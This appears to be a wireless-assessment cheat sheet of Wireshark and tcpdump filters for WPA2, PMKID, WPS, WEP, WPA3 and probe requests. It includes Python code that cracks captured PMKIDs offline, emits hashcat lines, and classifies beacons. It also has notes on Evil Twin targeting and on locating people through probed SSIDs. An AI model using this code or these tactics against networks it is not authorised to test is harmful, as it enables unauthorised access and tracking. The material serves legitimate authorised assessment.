
Wifi Capture Filters

WPA2 Networks

  • identify a network that advertises WPA2 (RSN element, tag 48) or WPA1 (vendor-specific element, tag 221, Microsoft OUI 00:50:f2 type 1). Tag 221 is also used by WMM and many other vendor elements, so the 221 half of this filter matches far more than WPA1 beacons; whether the network is PSK or 802.1X is given by the AKM suite type inside the RSN element, not by the tag number
wlan.tag.number == 221 or wlan.tag.number == 48

WPA2 PMKID

  • The PMKID is a per-client key identifier the AP sends in the first EAPOL-Key message (M1) of the four-way handshake, so it can be captured from the AP alone, before any client finishes the handshake
  • Carried in the optional RSN PMKID KDE (and in the RSN element of (re)association requests) to support AP roaming; not every AP includes it
  • Assigned at the time of joining a network to track which PMK should be used for the network
  • The PMKID is used to identify to the AP which PMK should be used for the newly roamed client
  • It is computed as HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || client MAC), so a captured PMKID plus the SSID and both MACs is enough to test candidate passphrases offline
wlan.rsn.ie.pmkid
# OR: tag 221 is any vendor-specific element (the KDEs in EAPOL key data dissect as tag 221, but so do vendor elements in every beacon), so restrict it to EAPOL frames
wlan.tag.number eq 221
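The offline check behind the PMKID attack, as an added example that is not from the original page: derive the PMK from a candidate passphrase and the SSID, recompute the PMKID with the AP and client MACs taken from EAPOL M1, and compare it with the captured value. The PMK derivation (PBKDF2-HMAC-SHA1, 4096 rounds, 32 bytes) and the PMKID construction follow IEEE 802.11; the passphrase/SSID/PMK test vector is the one published in the 802.11 standard, while the MAC addresses and the candidate list are constructed for the example. `hashcat_22000_line` is a convenience helper that emits hashcat's documented mode-22000 layout.

```python
"""Recompute a WPA2 PMKID from a candidate passphrase and test it against the
PMKID captured from EAPOL message 1 (the offline "PMKID attack").
Added example, not from the original page; stdlib only. The PMK derivation
(PBKDF2-HMAC-SHA1, 4096 rounds, 32 bytes) and PMKID construction
(HMAC-SHA1-128 over "PMK Name" || AP MAC || client MAC) follow IEEE 802.11.
The passphrase/SSID/PMK test vector is the one published in the 802.11
standard; the MAC addresses and candidate list are constructed for the example."""
import hashlib
import hmac

# Test vector from IEEE 802.11 (PSK derivation annex): passphrase "password", SSID "IEEE"
IEEE_VECTOR_PMK_HEX = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"

def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal: PMK == PSK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = Truncate-128(HMAC-SHA1(PMK, "PMK Name" || AA || SPA))."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]

def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))

def crack_pmkid(captured_hex: str, ssid: str, ap_mac: str, sta_mac: str, candidates):
    """Return the first candidate passphrase whose PMKID equals the captured one, else None.
    Each guess costs one PBKDF2 run (4096 SHA-1 rounds), which is why this is done offline on GPUs."""
    target = bytes.fromhex(captured_hex)
    aa, spa = mac_bytes(ap_mac), mac_bytes(sta_mac)
    for cand in candidates:
        if hmac.compare_digest(pmkid(derive_pmk(cand, ssid), aa, spa), target):
            return cand
    return None

def hashcat_22000_line(captured_hex: str, ap_mac: str, sta_mac: str, ssid: str) -> str:
    """PMKID in hashcat's documented mode-22000 layout: WPA*01*PMKID*MAC_AP*MAC_STA*ESSID_hex***"""
    return "*".join(["WPA", "01", captured_hex.lower(), mac_bytes(ap_mac).hex(),
                     mac_bytes(sta_mac).hex(), ssid.encode().hex(), "", "", ""])

if __name__ == "__main__":
    ssid, ap, sta = "IEEE", "02:00:00:aa:00:01", "02:00:00:00:00:01"   # constructed MACs
    captured = pmkid(derive_pmk("password", ssid), mac_bytes(ap), mac_bytes(sta)).hex()
    print(hashcat_22000_line(captured, ap, sta, ssid))
    print("recovered:", crack_pmkid(captured, ssid, ap, sta, ["letmein", "Password1", "password"]))
```

In a real capture the three inputs come straight from the filters above: the PMKID from `wlan.rsn.ie.pmkid`, the AP and client MACs from the address fields of the same EAPOL frame, and the SSID from a beacon or probe response of that BSSID.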

WPS Detection

  • We can see if an AP advertises WPS in its beacons and probe responses. State 0x02 means the AP is configured (0x01 = not configured); the WPS element being present is the precondition for WPS PIN attacks, though many APs lock the PIN after a few failed attempts
wps.wifi_protected_setup_state eq 0x02

WEP Networks

  • Per Wigle.net as of 2024, WEP networks make up less than 5% of all wireless networks, however they can still be found!
  • Every WEP data frame carries a:
    • 24-bit initialization vector (IV), sent in the clear
    • 2-bit key index number (which of up to four configured keys was used)
    • 32-bit integrity check value (ICV, a CRC-32 over the plaintext)
  • The small IV space, and the IV reuse it forces, is what makes the key recoverable from enough captured data frames
  • Display only WEP encrypted data packets
wlan.wep.iv

BSSID

  • Filtering on BSSIDs (exclude one AP, then include only that AP). wlan.bssid matches frames that belong to that BSS; parenthesize the negation so it applies to the whole comparison
!(wlan.bssid eq 58:6d:8f:07:4e:8d)
wlan.bssid eq 58:6d:8f:07:4e:8d

Handshakes

  • To filter for four-way handshake packets in Wireshark. eapol also matches group-key handshakes and 802.1X/EAP frames; a crackable capture needs at least M2 together with M1 or M3 of the same exchange, plus a beacon or probe response giving the SSID
eapol
  • To filter for four-way handshake packets in tcpdump, or to set a capture filter that only grabs EAPOL frames (0x888e is the EAPOL EtherType, matched in the LLC/SNAP header on monitor-mode captures)
ether proto 0x888e

Beacons

  • Wireshark filter for beacon frames (management type 0, subtype 8)
wlan.fc.type_subtype == 0x0008

Management Frames

  • Wireshark filter for all management frames (type 0: beacons, probes, auth/assoc, deauth/disassoc)
wlan.fc.type == 0

Probe Requests

  • Find clients probing for SSIDs by name (directed probe requests). Useful if you are looking to stand up an Evil Twin and would like a specific client to connect to you; a probe with an empty (wildcard) SSID names no network
  • Probe requests can have privacy implications. If you capture SSID names and they are unique, you are able to query https://wigle.net to potentially find home locations/work locations
(wlan.fc.subtype == 4) && (wlan.fc.type == 0)
# filter out probe requests: negate the whole conjunction. Negating each term separately (!(subtype == 4) && !(type == 0)) would also drop every other management frame and every subtype-4 frame of other types, such as null-data frames
!((wlan.fc.subtype == 4) && (wlan.fc.type == 0))

WPA3 PSK networks

  • We can identify these networks in a Wireshark pcap by filtering on the Auth Key Management (AKM) suite advertised in the RSN element of beacons
wlan.fc.type_subtype == 0x0008 && wlan.rsn.akms == 0x000FAC08
  • AKM suite 00-0F-AC:8 is SAE, the WPA3-Personal key exchange. Selector types are list-specific: cipher suite 00-0F-AC:8 is GCMP-128, but that value lives in the pairwise/group cipher fields, not in the AKM list, and WPA3-Personal most commonly pairs SAE with CCMP-128 (00-0F-AC:4)

Find Data packets with no Frame Body Encryption

  • Encryption can still be used at the application layer i.e. TLS
  • Catches protocols sent in the clear over the air: open networks, or data frames exchanged before the four-way handshake completes (the Protected Frame bit in Frame Control is 0)
wlan.fc.protected == 0 && wlan.fc.type == 2

WPA3 Transition networks

  • Wireshark filter for WPA3 transition (mixed-mode) networks. The AP advertises two AKM suites in one RSN element, PSK and SAE, so both comparisons are true for the same beacon (wlan.rsn.akms is multi-valued and == matches any entry); such networks also set MFP capable but not MFP required in the RSN capabilities
wlan.fc.type_subtype == 0x0008 && wlan.rsn.akms == 0x000FAC02 && wlan.rsn.akms == 0x000FAC08
  • 0x000FAC02 == PSK (WPA2-Personal)
  • 0x000FAC08 == SAE (WPA3-Personal)
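The Probe Requests, WPA3 PSK and WPA3 Transition sections above all reduce to reading a few fields out of raw 802.11 frames. The following added example (not from the original page; stdlib only) does that in code: it strips the radiotap header, reports which client probed for which SSID, shows why type and subtype must be checked together (a null-data frame is type 2, subtype 4), and classifies each beacon as WPA2-PSK, WPA3-SAE or transition mode from the AKM suites and capabilities of its RSN element. Frame layouts follow IEEE 802.11; every MAC, SSID and frame in the sample capture is constructed for the example.

```python
"""Parse raw 802.11 frames (radiotap-prefixed) the way the probe-request and
WPA3 display filters above do: which client probed for which SSID, and what
security each beacon advertises, judged by the AKM suites in its RSN element.
Added example, not from the original page; stdlib only. Layouts follow IEEE
802.11; every MAC, SSID and frame below is constructed for the example."""
import struct

BCAST, RSN_OUI = b"\xff" * 6, b"\x00\x0f\xac"
RADIOTAP_MIN = b"\x00\x00\x08\x00\x00\x00\x00\x00"  # version, pad, len=8 (LE), present=0

def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)

def strip_radiotap(frame):  # radiotap: version(1) pad(1) length(2 LE) present(4) ...
    return frame[struct.unpack_from("<H", frame, 2)[0]:]

def frame_type_subtype(frame):  # FC byte 0: bits 0-1 version, 2-3 type, 4-7 subtype
    return (frame[0] >> 2) & 0x3, (frame[0] >> 4) & 0xF

def is_probe_request(frame):
    """Type AND subtype: subtype 4 alone also matches null-data frames (type 2)."""
    return frame_type_subtype(frame) == (0, 4)

def tags(body):
    """Yield (tag id, value) over an 802.11 tagged-parameter list."""
    off = 0
    while off + 2 <= len(body):
        tid, tlen = body[off], body[off + 1]
        yield tid, body[off + 2:off + 2 + tlen]
        off += 2 + tlen

def parse_rsn(ie):
    """RSN IE: version(2) group(4) n_pairwise(2) pairwise[] n_akm(2) akm[] caps(2)."""
    n_pw = struct.unpack_from("<H", ie, 6)[0]
    off = 8 + 4 * n_pw
    n_akm = struct.unpack_from("<H", ie, off)[0]
    akms = [ie[off + 2 + 4 * i:off + 6 + 4 * i] for i in range(n_akm)]
    off += 2 + 4 * n_akm
    caps = struct.unpack_from("<H", ie, off)[0] if len(ie) >= off + 2 else 0
    return {"akms": akms, "mfpc": bool(caps & 0x0080), "mfpr": bool(caps & 0x0040)}

def classify_beacon(frame):
    """(bssid, ssid, label) for a beacon, else None; mirrors the wlan.rsn.akms filters."""
    if frame_type_subtype(frame) != (0, 8):
        return None
    cap = struct.unpack_from("<H", frame, 34)[0]  # body: timestamp(8) interval(2) capability(2)
    ssid, rsn, wpa1 = "", None, False
    for tid, val in tags(frame[36:]):
        if tid == 0:
            ssid = val.decode("utf-8", "replace")
        elif tid == 48:
            rsn = parse_rsn(val)
        elif tid == 221 and val[:4] == b"\x00\x50\xf2\x01":  # Microsoft OUI type 1 = WPA1
            wpa1 = True
    if rsn is None:
        return mac_str(frame[16:22]), ssid, "WPA1" if wpa1 else "WEP" if cap & 0x0010 else "Open"
    akm = {s[3] for s in rsn["akms"] if s[:3] == RSN_OUI}  # 2 = PSK, 8 = SAE
    label = ("WPA3 transition (PSK+SAE)" if {2, 8} <= akm else "WPA3-SAE" if 8 in akm
             else "WPA2-PSK" if 2 in akm else "RSN other AKM " + str(sorted(akm)))
    label += ", MFP " + ("required" if rsn["mfpr"] else "capable" if rsn["mfpc"] else "off")
    return mac_str(frame[16:22]), ssid, label

def analyze(capture):
    """Strip radiotap, then collect directed probe requests and classified beacons."""
    probes, beacons = [], []
    for fr in map(strip_radiotap, capture):
        if is_probe_request(fr):
            ssid = next((v for t, v in tags(fr[24:]) if t == 0), b"")
            if ssid:  # a wildcard (empty) SSID reveals nothing about the client
                probes.append((mac_str(fr[10:16]), ssid.decode("utf-8", "replace")))
        elif (b := classify_beacon(fr)):
            beacons.append(b)
    return probes, beacons

# --- constructed sample capture (not real traffic) ---------------------------
def _hdr(fc0, a1, a2, a3):  # FC, duration, addr1..3, seq ctl = 24-byte header
    return bytes([fc0, 0, 0, 0]) + a1 + a2 + a3 + b"\x00\x00"

def _tag(tid, val):
    return bytes([tid, len(val)]) + val

def _rsn(akm_types, caps):  # group/pairwise CCMP-128 (00-0F-AC:4), given AKMs and RSN caps
    lst = lambda ts: struct.pack("<H", len(ts)) + b"".join(RSN_OUI + bytes([t]) for t in ts)
    return _tag(48, b"\x01\x00" + RSN_OUI + b"\x04" + lst([4]) + lst(akm_types) + struct.pack("<H", caps))

def _beacon(bssid, ssid, rsn_ie):  # timestamp+interval zeroed, capability 0x0411 (ESS, privacy)
    return _hdr(0x80, BCAST, bssid, bssid) + b"\x00" * 10 + b"\x11\x04" + _tag(0, ssid.encode()) + rsn_ie

STA = bytes.fromhex("020000000001")
AP = [bytes.fromhex(f"020000aa00{i:02x}") for i in (1, 2, 3)]
SAMPLE_FRAMES = [
    _hdr(0x40, BCAST, STA, BCAST) + _tag(0, b"CoffeeShop"),  # directed probe request
    _hdr(0x40, BCAST, STA, BCAST) + _tag(0, b""),            # wildcard probe request
    _hdr(0x48, AP[0], STA, AP[0]),                            # null-data frame: type 2, subtype 4
    _beacon(AP[0], "corp-legacy", _rsn([2], 0x0000)),         # WPA2-PSK, no MFP
    _beacon(AP[1], "corp-wpa3", _rsn([8], 0x00C0)),           # WPA3-SAE, MFP required
    _beacon(AP[2], "corp-transition", _rsn([2, 8], 0x0080)),  # transition mode, MFP capable
]
SAMPLE_CAPTURE = [RADIOTAP_MIN + f for f in SAMPLE_FRAMES]

if __name__ == "__main__":
    probes, beacons = analyze(SAMPLE_CAPTURE)
    print(*probes, *beacons, sep="\n")
```

To run it against a real capture, feed `analyze` the frame bytes of a monitor-mode pcap with radiotap link type (what the tcpdump command at the end of this page produces); frames captured with a different link type need a different header strip. The third sample frame is the case the broken exclusion filter gets wrong: it has subtype 4 but is a data frame, and only the combined type/subtype test keeps it out of the probe-request set.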

Tcpdump no Beacons / Control frames

tcpdump -i wlan0mon -s 0 -n -w out.pcap 'not type mgt subtype beacon and not type ctl'
  • capture the whole packet with -s 0 (wlan0mon is assumed to be a monitor-mode interface; -n disables name resolution)
  • capture everything that is not a beacon frame or a control frame (both are loud)
    • generally 10 beacon frames a second from each AP. If you are in range of 20 APs that can get rough quickly on pcap size
  • Great tcpdump filter for assessments on smaller devices like a Pi